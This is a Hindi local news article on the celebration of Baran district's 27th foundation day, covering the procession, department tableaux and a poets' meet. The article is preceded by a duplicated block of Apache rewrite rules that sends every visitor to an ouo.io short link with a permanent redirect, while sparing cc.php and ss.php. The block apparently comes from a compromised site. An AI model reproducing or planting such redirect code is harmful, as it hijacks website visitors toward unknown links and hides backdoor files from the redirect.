
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 497
Previous Nextबारां। जिला स्थापना दिवस के अवसर पर आज बारां में विविध कार्यक्रमों का आयोजन किया गया। आपको बता दें कि बारां जिला आज 27 साल पूरे कर 28वें साल में प्रवेश कर गया है। जिला स्थापना दिवस की 27वीं वर्षगांठ के मौके पर सुबह शोभायात्रा निकाली गई, जिसका जगह-जगह स्वागत हुआ। बारां जिला स्थापना दिवस पर विविध कार्यक्रम आयोजित किये जा रहे हैं। सांस्कृतिक संध्या के तहत कवि सम्मेलन का आयोजन होगा। बारां जिला स्थापना दिवस की 27वीं वर्षगांठ आज उत्साह, उमंग के साथ धूमधाम से मनाई जा रही है। इस मौके पर जन सहभागिता के साथ शोभायात्रा, झांकियां एवं अखिल भारतीय कवि सम्मेलन का आयोेजन किया जाएगा। जिला कलेक्टर डॉ. एस.पी. सिंह ने जिले के समस्त नागरिकों को जिला स्थापना दिवस की शुभकामनाएं देते हुए सभी को शोभायात्रा, सांस्कृतिक संध्या के तहत आयोजित कवि सम्मेलन में सहभागिता निभाने और शामिल होने की अपील की है। बारां जिला स्थापना दिवस पर जन-जन की सहभागिता सुनिश्चित करते हुए विविध कार्यक्रम आयोजित किए जाएंगे जिसके तहत आज प्रातः 7.30 बजे श्री प्यारेराम जी के मंदिर में विधिवत पूजन कार्यक्रम के पश्चात भव्य शौभायात्रा निकाली गई। शोभायात्रा प्यारेराम जी के मंदिर से प्रारंभ होकर धर्मादा चौराहा, प्रताप चौक होते हुए श्रीराम स्टेडियम पर समाप्त हुई। शोभायात्रा में झांकियां क्रमशः वन विभाग, जिला परिषद, नगर परिषद, कृषि विभाग, चिकित्सा एवं स्वास्थ्य विभाग, सामाजिक न्याय एवं अधिकारिता विभाग, शिक्षा विभाग एवं आयुर्वेद विभाग द्वारा निकाली गई। शोभायात्रा में सभी वर्गों, समुदायों, व्यापारिक संगठनों, स्वयंसेवी संगठनों की भागीदारी रही। साथ ही कलश यात्रा का कार्यक्रम भी आयोजित किया गया। शोभायात्रा का मार्ग में विभिन्न समाजों एवं व्यापारिक प्रतिष्ठानों द्वारा स्वागत भी किया गया। कार्यक्रमों की श्रृंखला में शिक्षा विभाग द्वारा प्रश्नोत्तरी प्रतियोगिता का आयोजन भी किया जाएगा।